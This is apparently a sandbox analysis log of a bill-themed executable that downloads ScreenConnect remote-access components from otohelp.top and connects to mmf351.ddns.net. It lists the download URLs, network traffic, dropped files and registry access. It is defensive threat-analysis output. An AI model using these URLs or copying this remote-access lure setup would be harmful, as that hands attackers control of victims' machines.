Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: otohelp.topAccept-Encoding: gzip

Source: global traffic	DNS traffic detected: DNS query: otohelp.top
Source: global traffic	DNS traffic detected: DNS query: mmf351.ddns.net

Source: E_BILL0041272508.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
Source: E_BILL0041272508.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: E_BILL0041272508.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: F2E248BEDDBB2D85122423C41028BFD40.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
Source: dfsvc.exe, 00000002.00000002.3989443598.0000023CCC067000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0
Source: E_BILL0041272508.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: dfsvc.exe, 00000002.00000002.3989443598.0000023CCC067000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0pI
Source: svchost.exe, 00000004.00000002.3767047379.0000027458200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: E_BILL0041272508.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: dfsvc.exe, 00000002.00000002.4003675157.0000023CE612B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
Source: E_BILL0041272508.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: E_BILL0041272508.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: dfsvc.exe, 00000002.00000002.4003675157.0000023CE612B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
Source: E_BILL0041272508.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: dfsvc.exe, 00000002.00000002.4003310166.0000023CE60F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: dfsvc.exe, 00000002.00000002.3989443598.0000023CCBFF0000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.2.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.4.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.2.dr	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
Source: E_BILL0041272508.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: E_BILL0041272508.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: E_BILL0041272508.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: E_BILL0041272508.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: dfsvc.exe, 00000002.00000002.4003051515.0000023CE609F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
Source: dfsvc.exe, 00000002.00000002.3989443598.0000023CCC0A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: E_BILL0041272508.exe, 00000000.00000003.2526903886.000000000147B000.00000004.00000020.00020000.00000000.sdmp, E_BILL0041272508.exe, 00000000.00000002.2527278235.000000000147B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.dign
Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC14A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.2443372592.00000000020BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: E_BILL0041272508.exe, 00000000.00000003.2526903886.000000000147B000.00000004.00000020.00020000.00000000.sdmp, E_BILL0041272508.exe, 00000000.00000002.2527278235.000000000147B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/2
Source: E_BILL0041272508.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.o
Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC569000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC5CF000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC49A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.or
Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC1C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC1C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
Source: ScreenConnect.Core.dll.2.dr	String found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
Source: edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000004.00000003.2142326938.0000027458100000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC893000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC14A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top
Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Clie
Source: dfsvc.exe, 00000002.00000002.4003051515.0000023CE60C6000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4003675157.0000023CE612B000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4003310166.0000023CE60D3000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4002687215.0000023CE6050000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC49A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2386219481.000000001AEB0000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2385257906.00000000023AF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2384641977.000000000070D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2385887426.000000001AE30000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2385257906.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2386097468.000000001AE66000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2383915676.00000000006AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.application
Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.2385257906.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2386097468.000000001AE66000.00000004.00000020.00020000.00000000.sdmp, AYPVIQNL.log.2.dr	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.application
Source: dfsvc.exe, 00000002.00000002.4003310166.0000023CE60D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.application$E
Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.2386219481.000000001AEB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.application.tio&
Source: dfsvc.exe, 00000002.00000002.4002687215.0000023CE6050000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.application0
Source: E_BILL0041272508.exe, 00000000.00000003.2526903886.000000000147B000.00000004.00000020.00020000.00000000.sdmp, E_BILL0041272508.exe, 00000000.00000002.2527278235.000000000147B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.application?e=
Source: AYPVIQNL.log.2.dr	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&
Source: dfsvc.exe, 00000002.00000002.4003310166.0000023CE60D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.applicationTz
Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.2385257906.00000000023AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.applicationX
Source: dfsvc.exe, 00000002.00000002.4003870164.0000023CE618E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.applicationc
Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.2384641977.000000000070D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.applicationml%%
Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.dll
Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.2385257906.00000000023AF000.00000004.00000800.00020000.00000000.sdmp, AYPVIQNL.log.2.dr	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.manifest
Source: dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.manifestllT
Source: dfsvc.exe, 00000002.00000002.4002687215.0000023CE6050000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Client.manifestq
Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.ClientSe
Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4002687215.0000023CE6050000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.ClientService.dll
Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.ClientService.exe
Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC893000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4004252606.0000023CE620F000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC327000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Core.dll
Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Wind
Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4004252606.0000023CE620F000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Windows.dll
Source: dfsvc.exe, 00000002.00000002.4004252606.0000023CE620F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.Windows.dllR
Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsBackstage
Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe
Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config
Source: dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.configZaB_
Source: dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exeLMEMH
Source: dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exeU
Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsC
Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsClient.ex
Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsClient.exe
Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsClient.exe.config
Source: dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsClient.exedl
Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsFileManag
Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.e
Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exe
Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exe.config
Source: dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exe0
Source: dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exe9
Source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC893000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.x

Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Uses secure TLS version for HTTPS connections

Source: unknown

HTTPS traffic detected: 79.110.49.16:443 -> 192.168.2.6:49714 version: TLS 1.2

E-Banking Fraud

Drops certificate files (DER)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4	Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect	Jump to behavior
